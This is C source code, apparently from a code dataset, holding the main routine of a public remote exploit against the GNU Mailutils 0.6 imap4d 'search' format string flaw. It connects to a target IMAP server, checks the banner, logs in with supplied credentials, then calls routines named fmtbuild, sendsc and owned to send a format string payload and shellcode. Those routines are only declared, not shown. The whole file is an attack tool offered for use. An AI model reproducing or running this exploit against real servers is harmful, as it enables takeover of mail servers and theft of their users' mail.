
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct in_addr {int dummy; } ;
struct sockaddr_in {int sin_zero; struct in_addr sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;


 int AF_INET ;
 char EOF ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int auth (int,char*,char*) ;
 scalar_t__* b ;
 int bzero (int *,int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int fmtbuild (int) ;
 struct hostent* gethostbyname (char*) ;
 char getopt (int,char**,char*) ;
 int herror (char*) ;
 int htons (int) ;
 size_t i ;
 char* inet_ntoa (struct in_addr) ;
 char* optarg ;
 int owned (int,char*) ;
 int perror (char*) ;
 int printf (char*,char*,int) ;
 int puts (char*) ;
 size_t recv (int,scalar_t__*,int,int ) ;
 int sendsc (int) ;
 int socket (int ,int ,int ) ;
 int * strstr (scalar_t__*,char*) ;
 int usage (char*) ;

int main(int ac, char **av){
 char o, *host, *user, *pass;
 struct hostent *h;
 struct sockaddr_in s;
 int port, fd;

 puts("[+] GNU Mailutils 0.6 imap4d 'search' format string exploit.");
 puts("[+] By clem1.");

 if(ac != 9) usage(av[0]);

 while((o = getopt(ac,av,"h:p:u:s:")) != EOF) {
  switch (o) {
   case 'h':
    host = optarg;
    break;
   case 'p':
    port = atoi(optarg);
    break;
   case 'u':
    user = optarg;
    break;
   case 's':
    pass = optarg;
    break;
   default:
    usage(av[0]);
    break;
  }
 }
 if((h = gethostbyname(host)) == ((void*)0)) {
  herror("[-] gethostbyname()");
  exit(1);
        }

 printf("[+] connecting to: %s:%d\n", inet_ntoa(*((struct in_addr *)h->h_addr)), port);

 fd = socket(AF_INET, SOCK_STREAM, 0);
 if(fd == -1){
  perror("[-] socket()");
  exit(1);
 }

 s.sin_family = AF_INET;
 s.sin_port = htons(port);
 s.sin_addr = *((struct in_addr *)h->h_addr);
 bzero(&(s.sin_zero), 8);

 if (connect(fd, (struct sockaddr *)&s, sizeof s) == -1) {
  perror("[-] connect()");
  exit(1);
 }

 i = recv(fd, b, 1023, 0);
 b[i] = 0;
 if(strstr(b, "IMAP4rev1") == ((void*)0)){
  puts("[-] failled.");
  exit(1);
 }

 auth(fd, user, pass);

 fmtbuild(fd);

 sendsc(fd);

 owned(fd, host);
 return 0;
}
